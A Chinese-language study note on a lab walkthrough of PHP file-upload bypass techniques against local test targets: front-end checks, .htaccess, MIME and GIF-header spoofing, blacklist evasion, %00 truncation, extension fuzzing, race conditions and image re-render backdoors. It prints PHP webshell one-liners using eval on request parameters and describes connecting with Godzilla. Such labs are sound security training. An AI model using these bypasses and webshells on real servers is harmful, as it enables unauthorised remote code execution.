047-WEB攻防-PHP应用&文件上传&函数缺陷&条件竞争&二次渲染&黑白名单&JS绕过#

如何判断是否是前端验证？#

首先抓包监听，如果上传文件的时候还没有抓取到数据包，但是浏览器就提示文件类型不正确的话，那么这个多半就是前端校验了。

代码判断：#

打开页面查看源码，发现在前端有对应过滤代码。

解决方式：#

1. 首先将木马文件的后缀修改为jpg（可通过过滤的文件后缀）
2. 通过burp抓取到数据包，修改回对应的木马文件解析后缀
3. 木马程序成功上传，即可通过哥斯拉获取权限

后续操作：#

获取上传的对应木马文件的地址URL：192.168.200.130:30001/upload/1.php
使用哥斯拉连接，进入后门，拿取权限

核心代码含义#

AddType application/x-httpd-php .png
这行代码的含义是将文件扩展名为 .png 的文件的 MIME 类型设置为 application/x-httpd-php。

操作步骤：#

1. 将木马后缀修改为上传对应设置的文件后缀 .png，后上传

2. 通过burp进行抓包，并将文件后缀修改为**.htaccess**，并将代码内容修改为 AddType application/x-httpd-php .png

   

   

   

   

   

注意事项：#

• 直接访问对应上传1.png的路径（http://192.168.200.130:30002/upload/1.png），访问 http://192.168.200.130:30002/upload/.htaccess 这个是解析木马文件的规则，直接访问会报错403

• 无文件解析安全问题上，格式解析是一对一的。例如：规定的解析规则是 AddType application/x-httpd-php .png，但如果上传的文件为jpg等，则木马文件不会被解析。

  

  

核心类型#

Content-Type：image/png

操作步骤：#

1. 将木马后缀修改为可以通过文件过滤的后缀png并上传
2. 通过burp进行抓包，并将木马文件后缀名修改回来
3. 成功上传，并获取到文件上传路径URL：http://192.168.200.130:30003/upload/1.php
4. 通过哥斯拉，通过后门，获取权限

核心文件头#

GIF89a（gif所有文件默认的文件头）

操作步骤：#

1. 首先将木马文件代码前加入文件头（GIF89a）
2. 将任意的gif文件上传，获取文件格式 Content-Type: image/gif
3. 将木马文件进行上传，并将文件格式修改为获取的gif文件格式，然后上传
4. 成功上传，并获取到文件上传路径URL：192.168.200.130:30004/upload/shell.php
5. 通过哥斯拉，通过后门，获取权限

原理#

黑名单中的词 “php” 被替换为空字符串，但留下了 “pphphp”。这是因为 str_ireplace() 函数会对字符串进行不区分大小写的替换。

操作步骤：#

1. 正常上传木马程序shell.php，发现有黑名单过滤关键词“php”
2. 抓包，将文件后缀修改为**.pphphp**即可成功上传
3. 获取上传地址URL：http://192.168.200.130:30005/upload/shell.php
4. 通过哥斯拉，连接后门，获取权限

系统差异#

• window：大小写过滤不敏感
• linux：大小写过滤敏感

操作步骤：#

1. 直接使用木马文件shell.php上传，后缀会被替换为空
2. 将后缀名修改为**.phP**，则可以绕过过滤

原理#

URL路径出现在POST的URL中自动解码一次，例如 /var/www/html/upload/x.php%00。将木马文件以.jpg格式上传，可获得到一个对应.jpg文件 img src="./upload/9720240216044425.jpg，通过修改POST中URL路径使用%00截取，即只有前面x.php被拼接到名称中，后面都被舍弃，文件解析时依照被拼接的x.php进行解析，木马文件被成功解析。

操作步骤：#

1. 随便上传文件，抓包并发送至Repeater，发送查看回显数据，确认PHP版本为5.2.17
2. 将木马文件修改为**.jpg**，并上传抓包，将POST中URL路径加上**/var/www/html/upload/a.php%00**
3. 访问对应的URL文件上传地址：http://192.168.200.130:30007/upload/a.php
4. 通过哥斯拉，连接后门，获取权限

原理#

手工解码一次，例如 ../upload/x.php%00 需二次解码。URL路径出现在POST下面的数据包中，需要手动解码。

操作步骤：#

1. 上传木马文件修改为.jpg格式，抓包，发现URL路径出现在POST下面的数据包中
2. 将 ./upload/ 后面加上x.php%00，并选中该行，右键选择 Convert selection → URL → URL-decode 将所选内容转换为 URL 解码（进行手动转码）
3. 访问对应的URL文件上传地址：http://192.168.200.130:30008/upload/x.php
4. 通过哥斯拉，连接后门，获取权限

原理#

源码通过黑名单中的关键词后缀进行过滤，但由于无法考虑全面，可通过其他后缀名称进行绕过，使用字典替换抓包的文件后缀，通过判断长度变化，确定是否成功上传对应的木马文件。

操作步骤：#

1. 上传木马文件shell.php，通过抓包发送至Intruder
2. 选择 Clear$ 清除所有选中，选择木马文件后缀php，并按下 Add 替换该后缀
3. 选择 Payloads → Payload Options → Load 导入对应php后缀替换字典（路径示例：G:\develop\safety\字典\fuzzdb-master\attack\file-upload\alt-extensions-php.txt）
4. 选择右上角 Start attack，发现Length的长度不同（1573为未替换成功，1625为替换成功，非绝对，需通过哥斯拉验证是否可连接）
5. 访问对应的URL文件上传地址：http://192.168.200.130:30009/upload/shell.php5
6. 通过哥斯拉，连接后门，获取权限

核心木马代码及解析#

1
<?php fputs(fopen('xiao.php','w'),'<?php eval($_REQUEST[1]);?>');?>

• fopen('xiao.php','w')：打开或创建一个名为 ‘xiao.php’ 的文件，以写入模式（‘w’）。
• fputs：将后面的内容写入打开的文件，此处写入代码 <?php eval($_REQUEST[1]);?>。
• 写入的PHP代码：<?php eval($_REQUEST[1]);?> 包含 eval 函数，会执行作为参数传递的PHP代码，参数通过 $_REQUEST[1] 获取，即从HTTP请求的参数中获取第一个参数并执行其中的PHP代码。

上传不断发包 请求不断发包

操作步骤：#

1. 创建新的木马文件（代码如上）
2. 刷新想要获取的木马文件路径（请求页面）http://192.168.200.130:30010/upload/x.php，通过抓包抓取到请求页面，将此数据包发送至Intruder
3. 选中 Payloads → Payloads Sets → Payload type: Null payloads（负载类型：空负载），Payload Options → Continue indefinitely（无限继续）
4. 将设置好的木马文件上传，抓包并发送至Intruder（记得删除 clear $，即上传发包），同样设置无限发包
5. 访问对应的URL文件上传地址：http://192.168.200.130:30010/upload/xiao.php
6. 通过哥斯拉连接后门（注意：木马文件密码为1，需将连接代码对应修改为1），获取权限

操作步骤：#

1. 准备一个正常图片1.gif，上传并导出渲染后的图片
2. 将原始图片和渲染后的图片拉入010编辑器，打开工具→比较文件，对比保留（匹配）部分，在保留部分添加后门代码 <?php eval($_POST["pass"]);?>
3. 利用提示的文件包含执行图片后门代码，访问URL：http://192.168.200.130:30011/?file=upload/1919801737.gif
4. 执行代码：pass=phpinfo();

函数解析#

move_uploaded_file 是用于将上传文件移动到指定位置的PHP函数，语法如下：

1
move_uploaded_file(string $filename, string $destination): bool

其中，$filename 是上传文件的临时路径，$destination 是目标位置的路径和文件名，作用是将上传的文件从临时目录移动到指定位置，常用于处理文件上传功能。

操作步骤：#

1. 将自定义的保存文件名称写为 1.php/.
2. 将木马文件后缀修改为jpg并上传
3. 上传成功，获取对应的URL：192.168.200.130:30012/upload/1.php/
4. 通过哥斯拉，连接后门，获取权限